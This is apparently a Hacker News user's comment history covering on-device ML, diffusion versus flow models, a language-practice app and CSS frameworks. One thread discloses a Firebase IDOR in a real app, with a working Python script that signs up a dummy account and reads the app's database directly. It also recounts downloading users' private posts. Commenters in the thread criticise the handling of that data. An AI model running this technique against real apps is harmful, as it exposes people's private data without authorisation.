jc4p's comments | Hacker News

I do a lot of AI work, and right now the story for doing LLMs on iOS is very painful (though doing Whisper etc. is pretty nice), so this is exciting, and the API looks Swift-native and great. I can't wait to use it!

Question/feature request: Is it possible to bring my own CoreML models over and use them? I honestly end up bundling llama.cpp and running GGUF models right now because I can't figure out the setup for using CoreML models; I would love for all of that to be abstracted away for me :)


That’s a good suggestion, and it indeed sounds like something we’d want to support. Could you help us better understand your use case? For example, where do you usually get the models (e.g., Hugging Face)? Do you fine-tune them? Do you mostly care about LLMs (since you only mentioned llama.cpp)?


Thank you! I’ve been fine-tuning tiny Llama and Gemma models using transformers, then exporting from the safetensors it spits out. My main use case is LLMs, but I’ve also tried getting a fine-tuned YOLO and other PyTorch models running and ran into similar problems; it seemed very confusing to figure out how to properly use the phone for this.
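For reference, the conversion path I keep fighting with looks roughly like this (the model here is a stand-in, and shapes/deployment target are whatever your model needs); it's fine for small vision models but gets hairy fast for LLMs:

  import torch
  import coremltools as ct

  # Stand-in for a fine-tuned PyTorch model (e.g. a small vision backbone)
  model = torch.nn.Sequential(torch.nn.Conv2d(3, 8, 3), torch.nn.ReLU()).eval()
  example = torch.rand(1, 3, 224, 224)

  # Trace to TorchScript, then convert to an .mlpackage for on-device use
  traced = torch.jit.trace(model, example)
  mlmodel = ct.convert(
      traced,
      inputs=[ct.TensorType(name="input", shape=example.shape)],
      minimum_deployment_target=ct.target.iOS16,
  )
  mlmodel.save("FineTuned.mlpackage")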


Thanks for sharing the details; that makes a lot of sense. Fine-tuning models and then exporting them for on-device use is tedious right now. We're planning to look into supporting popular on-device LLMs more directly, so deployment feels much easier. We'll let you know here or reach out to you once we have something.


Hi all, I'm the security researcher mentioned in the article -- just to be clear:

1. The leak Friday was from Firebase's file storage service

2. This one is about their Firebase database service also being open (up until Saturday morning)

The tl;dr is:

1. App signed up using Firebase Auth

2. App traded Firebase Auth token to API for API token

3. API talked to Firebase DB

The issue is that you could just take the Firebase Auth key and talk to Firebase directly, and since they had read/write/update/delete permissions open to all users, it opened up an IDOR exploit.

I pulled the data Friday night to have evidence to prove the information wasn't old like the previous leak and immediately reached out to 404media.

Here is a gist of Gemini 2.5 Pro summarizing 10k random posts: https://gist.github.com/jc4p/7c8ce9a7392f2cbc227f9c6a4096111...

And to be 100% clear, the data in this second "leak" is a 300MB JSON file that (hopefully) only exists on my computer, but I did see evidence that other people were communicating with the Firebase database directly.

If anyone is interested in the how: I signed up against Firebase Auth using a dummy email and password, retrieved an idToken, sent it into the script generated by this Claude convo: https://claude.ai/share/2c53838d-4d11-466b-8617-eae1a1e84f56

And here's the output of that script (any db that has <100 rows is something another "hacker" wrote to and deleted from): https://gist.github.com/jc4p/bc35138a120715b92a1925f54a9d8bb...
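Boiled down, the script is just two standard Firebase REST calls; a minimal sketch (the API key and project URL below are placeholders):

  import requests

  API_KEY = "AIzaSy..."  # the app's public Firebase web API key (placeholder)
  DB_URL = "https://example-project.firebaseio.com"  # placeholder project URL

  # 1. Sign up a throwaway account against Firebase Auth
  signup = requests.post(
      "https://identitytoolkit.googleapis.com/v1/accounts:signUp",
      params={"key": API_KEY},
      json={"email": "dummy@example.com", "password": "hunter22",
            "returnSecureToken": True},
  )
  id_token = signup.json()["idToken"]

  # 2. Talk to the Realtime Database directly with that token; with the rules
  #    left open to any signed-in user, this returns data the app's own API
  #    was supposed to gate ("shallow" just lists the top-level keys)
  data = requests.get(f"{DB_URL}/.json",
                      params={"auth": id_token, "shallow": "true"})
  print(data.json())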


Doesn't that Gemini summary gist tie usernames to pretty specific highly personal non-public stories? That seems like a significant violation of ethical hacking principles.


They're anonymous usernames the app had them make, and users were told not to reuse anything from elsewhere. I googled and couldn't uniquely identify anyone from any of them.

They seem generic enough that I think it's okay, but you're right, there was no need to include them, and I should've caught that in the AI output. Thank you!!


I think including specific stories is already an ethical hacking violation.

Including the pseudonyms associated with those stories creates unnecessary risk of deanonymizing those individuals, and arguably an incentive to do so.

I also just don't get the mindset of dumping something like this into an AI tool for a summary. You say "a 300MB JSON file that (hopefully) only exists on my computer", but you then exposed part of that data to generate an AI summary.

Having the file on your computer is questionable enough but not treating it as something private to be professionally protected is IMHO another ethical violation.


I don't see the need for the AI output to begin with. Normally pen-testers just demonstrate breaches, this is more like exposing what users do on the app.


Are you concerned about potential CFAA issues?


Yes! Haha! But hopefully I have a good enough support group and connections that I'll be OK if that happens. I just really wanted to prove that they were not being honest when they said the data was from before 2024.


Computer Fraud and Abuse Act - "CFAA"


I've been trying to keep up with this field (image generation), so here are quick notes I took:

Claude's Summary: "Normalizing flows aren't dead, they just needed modern techniques"

My Summary: "Transformers aren't just for text"

1. SOTA model for likelihood on ImageNet 64×64, first ever sub-3.2 bits per dimension (prev was 2.99 by a hybrid diffusion model)

2. Autoregressive (transformer) approach; right now diffusion is the most popular in this space (it's much faster, but a different approach)

tl;dr of autoregressive vs diffusion (there are also other approaches):

Autoregression: step-based; generate a little, then more, then more

Diffusion: generate a lot of noise, then try to clean it up

The diffusion approach that is the baseline for SOTA is Flow Matching from Meta: https://arxiv.org/abs/2210.02747 -- lots of fun reading material if you throw both of these into an LLM and ask it to summarize the approaches!
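To make that contrast concrete, here's how the two sampling loops look schematically (the model calls are toy stand-ins so the sketch actually runs):

  import numpy as np

  def autoregressive_sample(next_token, length):
      # Build the sample one piece at a time, each conditioned on what exists so far
      tokens = []
      for _ in range(length):
          tokens.append(next_token(tokens))
      return tokens

  def diffusion_sample(denoise, shape, steps):
      # Start from pure noise and iteratively clean it up
      x = np.random.randn(*shape)
      for t in reversed(range(steps)):
          x = denoise(x, t)
      return x

  print(autoregressive_sample(lambda ts: len(ts), 5))        # [0, 1, 2, 3, 4]
  print(diffusion_sample(lambda x, t: 0.9 * x, (2, 2), 10))  # noise pulled toward 0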


You have a few minor errors and I hope I can help out.

  > Diffusion: generate a lot of noise then try to clean it up
You could say this about flows too. Their history is shared with diffusion and goes back to the Whitening Transform. Flows work through a coordinate transform, so we have an isomorphism, whereas diffusion works through (for easier understanding) a hierarchical mixture of Gaussians, which is a lossy process (it gets more confusing once we get into latent diffusion models, which are the primary type used). The goal of a Normalizing Flow is to turn your sampling distribution, which you don't have an explicit representation of, into a known probability distribution (typically normal noise, i.e. a Gaussian). So in effect there are a lot of similarities here. I'd highly suggest learning about flows if you want to better understand diffusion models.
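To make the coordinate-transform point concrete, here's a tiny PyTorch sketch of the exact likelihood a flow gets from the change of variables (a depth-1 affine "flow", purely illustrative):

  import torch

  # If z = f(x) maps data to a standard Gaussian, then
  #   log p(x) = log N(f(x); 0, I) + log|det J_f(x)|
  log_scale = torch.zeros(2, requires_grad=True)
  shift = torch.zeros(2, requires_grad=True)

  def log_prob(x):
      z = (x - shift) * torch.exp(-log_scale)   # f(x), an invertible affine map
      base = torch.distributions.Normal(0.0, 1.0)
      log_det = -log_scale.sum()                # log|det J_f| for this affine f
      return base.log_prob(z).sum(dim=-1) + log_det

  x = torch.randn(16, 2)                        # pretend data batch
  loss = -log_prob(x).mean()                    # train by exact maximum likelihood
  loss.backward()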

  > The diffusion approach that is the baseline for sota is Flow Matching from Meta
To be clear, Flow Matching is a Normalizing Flow; specifically, it is a Continuous and Conditional Normalizing Flow. If you want to get into the nitty-gritty, Ricky has a really good tutorial on the stuff [0].

[0] https://arxiv.org/abs/2412.06264
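And for intuition, the conditional flow matching objective itself is only a few lines; a toy sketch (the little MLP is a stand-in for the real architectures):

  import torch

  # Draw noise x0 and data x1, take a straight-line path between them, and
  # regress a velocity field onto the path's constant velocity (x1 - x0).
  v_theta = torch.nn.Sequential(
      torch.nn.Linear(3, 64), torch.nn.SiLU(), torch.nn.Linear(64, 2)
  )

  def flow_matching_loss(x1):
      x0 = torch.randn_like(x1)                   # base noise sample
      t = torch.rand(x1.shape[0], 1)              # random time in [0, 1]
      xt = (1 - t) * x0 + t * x1                  # point along the straight path
      target = x1 - x0                            # velocity of that path
      pred = v_theta(torch.cat([xt, t], dim=-1))  # condition on position and time
      return ((pred - target) ** 2).mean()

  loss = flow_matching_loss(torch.randn(32, 2))   # pretend data batch
  loss.backward()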


Thank you so much!!! I should've put that final sentence in my post!


Happy to help! If you have any questions, just ask; this is my jam.


Hi! I have a WIP of this over at https://talktrainer.app/ -- I just added Dutch to it.

It uses OpenAI's realtime API to simulate either a tutoring session (the speaker will revert to English to help you) or a first date or business meeting (the speaker will always speak the target language).

You can see the AI's transcriptions but not your own; that's a limitation of the current OpenAI API, but definitely something I can fix.

The prompts are like this: https://gist.github.com/jc4p/d8b9d121425ec191d62602d8720eeed... and the rest of it is a Next.js app wrapped around the WebRTC connection.

I'm not fully in love with the app, so I'd love any feedback, or to hear whether it works well for you. It doesn't have a lot of features yet (including saving context), and if you bump into the time limit, just open it up in incognito to keep going.


This is great! Maybe some more tourist-related scenarios, like "ordering at restaurant", "resolving dispute about rental car crash" etc? :-)

The "next level" feature would be to get it to speak even simpler, with some hints about how to reply, for the beginners. I don't know how that would ideally look, but maybe a button to pop up some "key words" or phrases that one could use? (Even so, I found myself using the little I know, so it's obviously somehow working even though my knowledge is extremely basic.)

This is one of the places where I feel LLM's can do something good for the world, giving a safe playground for getting experience with speaking new languages without the anxiety of performing badly in front of other people – and hopefully make it easier to connect with real people in that language later.


This is really impressive! Great job.

One small piece of feedback… There were a couple of times where I asked to learn something, and it asked me to repeat a phrase back, which was great. But when I repeated it back, I know I didn't quite nail it (e.g. perhaps said “un” instead of “una”), and rather than correcting me, it actually told me I did it perfectly. Maybe some tuning of the prompts could help turn down the natural sycophancy of the model and make sure it's a little more strict.

Keep up the great work!


One modification I would suggest is to add a bit more to the initial prompt like:

"write as if you are a person from {{REGION}}. Modify your language to proficiency level {{PROFICIENCY_LEVEL}}"

that way I could, for example, practice with someone using Mexican Spanish vs. Madrid Spanish vs. Chilean Spanish, etc.

Secondly, you could include the user's speech, transcribed, as part of the conversation window.


Amazing idea! Do you think this should be a freeform text field where the user can add their own prompts, or a checkbox/select on the homepage so the user can pick from a limited set?


I think a drop down when you first choose the language, and it can be optional. You can test it with a few languages at first, to see how it is.


Bit of feedback:

I learned Japanese a while back but haven't practised in a long time.

1. It would be awesome if this could transcribe what I just said in Japanese, to be sure it understood me.

2. I don't know kanji that well, so reading is hard; having a button to make the AI repeat the sentence would be quite useful.

Other than that, I could definitely use something like this for practice.


Did you just add Dutch as per the submitter’s request or was it part of your plan prior?

Curious because I’m trying to learn Romanian, and since it's a less common language there are fewer resources available, so I wasn't sure if you had added Dutch with a minimal amount of effort following the poster's request.

That said, I gave your app a try with Spanish and it looks pretty good! But I didn't see a Help page clarifying how I'm “supposed” to interact. E.g. I tried saying in English “I don't understand” (even though I know how to say that in Spanish) and it responded in Spanish, which may be hard for absolute beginners. Although full immersion is a much better way to learn.

I can try playing around more with it to give you some feedback.


> Eg I tried saying in English “I don’t understand” (even though I know how to say that in Spanish) and it responded in Spanish which may be hard for absolute beginners.

I tried to use ChatGPT as a "live" translator with my in-laws, and I noticed it is extremely bad at language "consistency", or at understanding your intent when it comes to multiple languages.

It will sometimes respond in English when you talk to it in the foreign language, it will sometimes assume that a clear instruction like "repeat the last sentence" needs to be translated, etc.

I don't know how the person above is approaching the problem, but your experience is consistent with mine, and I don't think GenAI models (at least OpenAI's) are suitable for the task.


I just added Romanian for you -- here's the entire diff for adding a new language (as long as it's in OpenAI's training data) -- https://images.kasra.codes/romanian_diff.png

Please let me know if it works, and I'll definitely work on adding in instructions for the expected interactivity, thank you!


I'm a native Dutch speaker and tried this out for a bit. It works impressively well, although it might be challenging for complete beginners. Maybe you can add an option for the trainer to use simpler language for beginners?

I tried practicing some verb conjugations. The trainer displayed some fill-in-the-blank sentences like "she ... home after class", asking me to conjugate "to walk" in that sentence. However, the audio actually pronounced the full sentence "she walks home after class", giving away the answer.


Just tried this for Spanish and it works incredibly well. I have been hacking on something similar for translation (it's really quite easy too, just a few prompts), but I was using Google Translate's interface for vocalizing! This is seriously good stuff, really nice work putting it together.

I will probably use something like this for language practice.


I just tried it and it works perfectly. The color scheme and font size could be touched up to look better. Just out of curiosity, is $10/month enough to cover the (unlimited) API cost? Have you estimated what percentage of your users will use more than $10 of API credit each month?


Thanks so much for trying it out! The realtime API is actually very cheap, especially for short connections: a user who uses it 30 minutes a day, every day for a month, costs me ~$5, and I assume the average user will use it way less than that (although I have 0 users right now, haha).


Please add Mandarin Chinese! :) would love to try this


This is great! Well done.

I've used the realtime API for something similar (also related to practicing speaking, though not for foreign languages). I just wanted to comment that the realtime API will definitely give you the user's transcriptions -- they come back as a `server.conversation.item.input_audio_transcription.completed` event. I use it in my app for exactly that purpose.


Thank you so much!! While the transcription is technically in the API, it's not a native part of the model; it runs through Whisper separately. In my testing I often end up with a transcription in a different language than what the user is speaking, and the current API has no way to force a language on the internal Whisper call.

If the language is correct, a lot of the time the exact text isn't 100% accurate; and when it is accurate, it comes in slower than the audio output and not in real time. All in all, not what I would consider ready to ship as a feature in my app.

What I've been thinking about is switching to a full audio in --> transcribe --> send to LLM --> TTS pipeline, in which case I would be able to show the exact input to the model, but that's way more work than a single OpenAI API call.
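For the curious, that pipeline is roughly the following with the standard OpenAI endpoints (model names and the language hint are placeholders I'd still need to tune):

  from openai import OpenAI

  client = OpenAI()  # assumes OPENAI_API_KEY is set in the environment

  def reply_to_speech(audio_path, target_language="Spanish"):
      # 1. STT: transcribe the user's audio; the language hint pins Whisper down
      with open(audio_path, "rb") as f:
          heard = client.audio.transcriptions.create(
              model="whisper-1", file=f, language="es"
          ).text

      # 2. LLM: generate the tutor's reply from the exact transcribed input
      reply = client.chat.completions.create(
          model="gpt-4o-mini",
          messages=[
              {"role": "system",
               "content": f"You are a friendly {target_language} tutor."},
              {"role": "user", "content": heard},
          ],
      ).choices[0].message.content

      # 3. TTS: speak the reply back to the user
      client.audio.speech.create(
          model="tts-1", voice="alloy", input=reply
      ).write_to_file("reply.mp3")
      return heard, reply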


Heyo, I work on the realtime API; this is a very cool app!

With transcription I would recommend trying out "gpt-4o-transcribe" or "gpt-4o-mini-transcribe" models, which will be more accurate than "whisper-1". On any model you can set the language parameter, see docs here: https://platform.openai.com/docs/api-reference/realtime-clie.... This doesn't guarantee ordering relative to the rest of the response, but the idea is to optimize for conversational-feeling latency. Hope this is helpful.
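For reference, setting it on the session looks roughly like this (a sketch; see the docs above for the exact shape of the event):

  import json

  # Sent as a JSON event over the realtime websocket / WebRTC data channel;
  # "language" pins the transcription model to one language (here Spanish).
  session_update = {
      "type": "session.update",
      "session": {
          "input_audio_transcription": {
              "model": "gpt-4o-mini-transcribe",
              "language": "es",
          }
      },
  }
  payload = json.dumps(session_update)  # write this to the open connection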


Ah yes, I've seen that occasionally too, but it hasn't been a big enough issue for me to block adoption in a non-productized tool.

I actually implemented the STT -> LLM -> TTS pipeline, too, and I allow users to switch between them. It's far less interactive, but it also gives much higher quality responses.

Best of luck!


This is super cool (I do a LOT of React Native after years of doing native development). One thing I'd love: easy upgrades. Right now, if I leave an RN app alone for a while, getting it to compile on the latest iOS/Android again requires a lot of manual labor and reviewing rn-diff-purge. Good luck on the project!


Autodesk bought EAGLE in 2016, so just about ten years between acquisition and discontinuation.

EAGLE is the first PCB design app I learned (and it had a harder onramp than React), so this is sad, but it is important to note that most hobbyists have already switched over to KiCad: https://www.kicad.org/


Even professionally, some of the places I worked for lately preferred KiCad because you can check libraries and projects into git and see meaningful diffs.


Altium sure does leave a lot to be desired in that respect with its large binary files.


And many other areas. I really enjoyed how they removed some features I used from their cloud offering and then made it a paid upgrade.


I am not sure if you realize that EAGLE is fully embedded and rebranded within Fusion 360, so you will have access to the same functionality, but in an integrated environment (for better or worse).


Speaking as a subscriber to Fusion: Do-it-all software is nearly always inferior to special purpose software. I don't use the built-in Eagle functionality in Fusion even though I've paid for it.


Yeah, I have no love for Autodesk as a begrudging Fusion 360 user, but on the surface, ten years before sunsetting an acquired product, plus integrating it into an existing platform in that same timeframe, is pretty good as far as product acquisitions go from an end-user perspective.


Yeah, on paper it looks like an acceptable strategy. Unfortunately, it looks like they botched the execution.


2016 was not 10y ago tho.


EOL is 2026, so ten years.


Surprised it lasted that long. This reminds me of when they bought out Softimage in 2009 because XSI might have grown into something that challenged Maya, then released the last version in 2014 after delivering five years of barely any new features.


Let me guess, they gave it half-baked support for FBX files?


It's anecdotal, but I just recently started getting into more hardware-oriented stuff and found that KiCad came recommended for PCB design/etc. I found it to be pretty useful, but I'm too much of a novice to really give it a fair shake.


My advice to new KiCad users is to watch someone on YouTube go through a familiar project to see what their flow is, then try to create your own project from design to implementation. Next, check out the KiCad library guidelines to see what it takes to create a library part, so you can get everything right. Lastly, open up the shortcuts screen so you can see which key does what; you'll pick up the most common ones quickly, and the others you'll see as you go through the menus.


I also used EAGLE first, briefly, for hobbyist work right after it got acquired, but my team soon switched to Altium, which seemed maybe too powerful for my needs. I used KiCad afterwards, and it works on Mac like EAGLE did.


Love running into old friends on HN. Some very stale info from someone who hasn't worked at SO in many years: while the job board was differentiated and nice from the programmer's side, it's really difficult to convince recruiters to use a new system with new rules. Most (not all, of course) just want to spray and pray.

As a job seeker, being told “you're gonna have the upper hand here” is amazing; but that makes it a very difficult product to sell to recruiters unless you really own the market.


Why would they offer him a job right before saying that? Some of it could be true, absolutely, but it seems more emotionally manipulative than anything else, to me. The CEO was mad so he said something.


> Why would they offer him a job right before saying that?

A few people have mentioned that on this thread, but I don't think it's in sync with the reality of how incredibly hard it is to hire technical talent right now, especially talent that knows your systems well.

It's entirely possible for someone to be the most demanding intern a co has ever had and still be a great hire; hell, it might even be _correlated_. Interns usually haven't figured out workplace norms yet, and combining that with being smart and driven could easily yield good-faith behavior that nevertheless is "demanding" (for example, asking lots of questions about tasks he's given, asking for guidance with parts of the system he's not working on, etc etc). In that case, I would absolutely want to hire that intern, with the understanding that he'd need to get better at the cultural aspects of the job once he joined full-time (as all intern conversions do).

That being said, no question that it was a bizarre and immature thing for the CEO to bring up, and I don't disagree with your characterization of it as "emotionally manipulative".


I'm looking at this from the perspective of "is the emotion/frustration felt by the CEO valid?" In other words, did this open source author actually do ANYTHING that could cause frustration for a previous employer? An important part of that is whether they actually were a 50% pain-in-the-ass employee who was repeatedly pushy (but perhaps still hireable because they were a net positive).

I'm disregarding any commentary on the actual action taken by the CEO because, as I said, I think it's incredibly stupid and immature.

This reply below by @treis is a good explanation of how I feel about the answer to your question.

> Lots of CEOs/Owners will definitely be salty about that. And they're not totally wrong to feel that way. You pay someone a bunch of money only to watch them walk and help your competitor take your market share. It's understandable why that's upsetting. But they should have the maturity to understand that's how the world works and not throw a tantrum.


This Wikipedia list is missing a lot of APIs; it seems more focused on products. For example, the QPX API (which I used) was shut down this April and is nowhere on that list. Your numbers are lower than they should be.


I'm pretty sure the QPX API was a purchase, not something Google started, so it's arguable whether you can categorize it the same way.


I'm pretty sure shutting down critical parts of acquired products is a major part of the problem.


Agreed. Just because they were acquired doesn't mean the acquired product's customers didn't feel the pain of a forced deprecation.


A notable example there is the recent incident where Twitter bought an ML startup for abuse analysis and cut off its customers overnight with almost no warning.


Advertising the framework as minimal and lightweight while comparing its size to the biggest frameworks is a bit off-putting to me.

I get that they wouldn't want to advertise their competitors, but the comparison matrix on the page makes mini.css seem tiny, whereas a Google search shows it's the biggest popular framework of this kind.

Mini.css is 7KB gzipped; Milligram [0] (the first Google result I see for "minimalist css framework"; mini.css is second) is 2KB gzipped, and Pure.css [1] (the third result) is 3.8KB gzipped.

[0] - https://milligram.github.io/ [1] - https://purecss.io/


Such a pity you didn't include my own, Picnic CSS [2]. One of its main features is being lightweight (7KB min+gzip, same as mini.css), and it is also popular (2,177 stars). It focuses on beautiful and cohesive components out of the box:

[2] https://picnicss.com/


Sorry, I was mostly going off the Google results. Your library looks really nice; being able to change the SCSS variables is awesome!


Thanks! It's a pity that the SCSS is basically undocumented, as I use it in most projects and it has really awesome features that only I know about. But documenting it would be a tremendous time sink, and I'm focusing on another project right now.


Pedantic aside: I'm wondering why you used "it's a pity" twice. I want to believe it was pure chance, but otherwise it sounds snarky.


I guess it's a translation issue; no need to insult me. The tone was intended to be totally different: the first one was like "hey, take a look at this", and the second one more like "I wish I could have done it" (and because of the different feeling, I didn't realize I had already used the same expression).


I have a list on a (largely unfinished) site I'm working on here: https://www.lightentheweb.com/libraries/


Nice! While you're at it, I also have a production-ready JS library, https://umbrellajs.com/, and an experimental, not-so-browser-compatible one, https://superdom.site/, in case you are interested.

BTW, I cannot seem to see the people behind it; the "About" page only says "This website was made by people. In the interests of inclusivity, we're aiming to get some robots to contribute soon."


Seems a bit lame to complain that someone chooses to not reveal who they are.

Frankly, I think you need to be less aggressive about shilling your own projects in a "competitor's" submission. Ctrl-F for your own username; it's a bit much.


But I wasn't complaining at all! I was just curious who was behind it, so I pointed it out in case it was an error in the code or in my browser.

And sure, I am passionate about minimal programming, so I've done quite a few projects and point them out as relevant examples. Though I agree I got a bit carried away in this thread (three comment threads with external links); my apologies (I can't change it now). See my submission history (https://news.ycombinator.com/threads?id=franciscop) for a fuller picture; I don't normally link to my projects nearly as much as I did here, and in the future I'll comment with relevant info without so many external links.


Ah it's fine, I really didn't mean to not have my name on the site anyway, I just didn't get around to adding it. I'll do that soon!


Ah, thank you, I will add those.

About the "about" page, the site is quite unfinished :( I want to add more information, examples and resources, but have fallen behind. I hope to fix that quite soon.

Thank you for your contribution!


I love Picnic; thank you for your contribution.


Also, a lot of the frameworks compared against are fully modular, so comparing against the full framework size doesn't mean much, because it almost never makes sense to include every module.

E.g. in Bootstrap 3, if you only want typography, it's 9kb min / 2.8kb gz; for typography + forms + buttons it's 27kb min / ~5kb gz; for all 'common CSS' (incl. grid + responsive utilities) it's 46kb min / 8.8kb gz.

The comparison size of 20kb gz is only if you pulled in every additional component available.


Both of those are gorgeous. Mini.css, not so much. I mean, Mini is fine, better than I could do. But when I visit, I feel neutral about it. I can't imagine it improving my projects just by including it. And the example of Mini customization (http://codepen.io/chalarangelo/pen/YNKYgz) is downright ugly.

I use CSS frameworks (mostly Bootstrap) because I suck at design. I need a hand up, and a good framework provides it. Customization is necessary, but not all that's necessary.

